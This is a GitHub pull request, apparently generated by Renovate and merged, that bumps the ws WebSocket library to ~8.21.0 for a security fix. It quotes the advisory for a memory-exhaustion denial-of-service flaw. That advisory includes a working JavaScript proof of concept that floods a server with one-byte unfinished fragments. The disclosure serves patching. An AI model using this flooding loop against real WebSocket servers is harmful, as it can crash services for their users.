Skip to content

chore(deps): update dependency ws to ~8.21.0 [security]#2818

Merged
tido64 merged 1 commit into
trunkfrom
renovate/npm-ws-vulnerability
Jun 16, 2026
Merged

chore(deps): update dependency ws to ~8.21.0 [security]#2818
tido64 merged 1 commit into
trunkfrom
renovate/npm-ws-vulnerability

Conversation

@renovate

@renovate renovate Bot commented Jun 15, 2026

Copy link
Copy Markdown
Contributor

This PR contains the following updates:

Package Change Age Confidence
ws ~8.20.0~8.21.0 age confidence

ws: Memory exhaustion DoS from tiny fragments and data chunks

CVE-2026-48779 / GHSA-96hv-2xvq-fx4p

More information

Details

Impact

A high volume of exceptionally small fragments and data chunks can be sent by a peer, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM.

Proof of concept
import { WebSocket, WebSocketServer } from 'ws';

const wss = new WebSocketServer({ port: 0 }, function () {
  const data = Buffer.alloc(1);
  const options = { fin: false };
  const { port } = wss.address();
  const ws = new WebSocket(`ws://localhost:${port}`);

  ws.on('open', function () {
    (function send() {
      ws.send(data, options, function (err) {
        if (err) return;
        send();
      });
    })();
  });

  ws.on('error', console.error);
  ws.on('close', function (code, reason) {
    console.log(`client close - code: ${code} reason: ${reason.toString()}`);
  });
});

wss.on('connection', function (ws) {
  ws.on('error', console.error);
  ws.on('close', function (code, reason) {
    console.log(`server close - code: ${code} reason: ${reason.toString()}`);
  });
});
Patches

The vulnerability was fixed in ws@8.21.0 (websockets/ws@bca91ad) and backported to ws@7.5.11 (websockets/ws@fd36cd8), ws@6.2.4 (websockets/ws@86d3e8a), and ws@5.2.5 (websockets/ws@b5372ac).

Workarounds

In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.

Credits

The vulnerability was responsibly disclosed and fixed by Nadav Magier.

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Release Notes

websockets/ws (ws)

v8.21.0

Compare Source

Configuration

📅 Schedule: (in timezone Europe/Oslo)

  • Branch creation
    • At any time (no schedule defined)
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate Bot requested a review from JasonVMo as a code owner June 15, 2026 21:50
@renovate renovate Bot added the dependencies Pull requests that update a dependency file label Jun 15, 2026
@renovate renovate Bot requested a review from tido64 as a code owner June 15, 2026 21:50
@renovate renovate Bot added the dependencies Pull requests that update a dependency file label Jun 15, 2026
@tido64 tido64 merged commit cdcc867 into trunk Jun 16, 2026
24 checks passed
@tido64 tido64 deleted the renovate/npm-ws-vulnerability branch June 16, 2026 07:34
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@tido64 tido64 tido64 approved these changes

@JasonVMo JasonVMo Awaiting requested review from JasonVMo JasonVMo is a code owner

Assignees

No one assigned

Labels

dependencies Pull requests that update a dependency file

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@tido64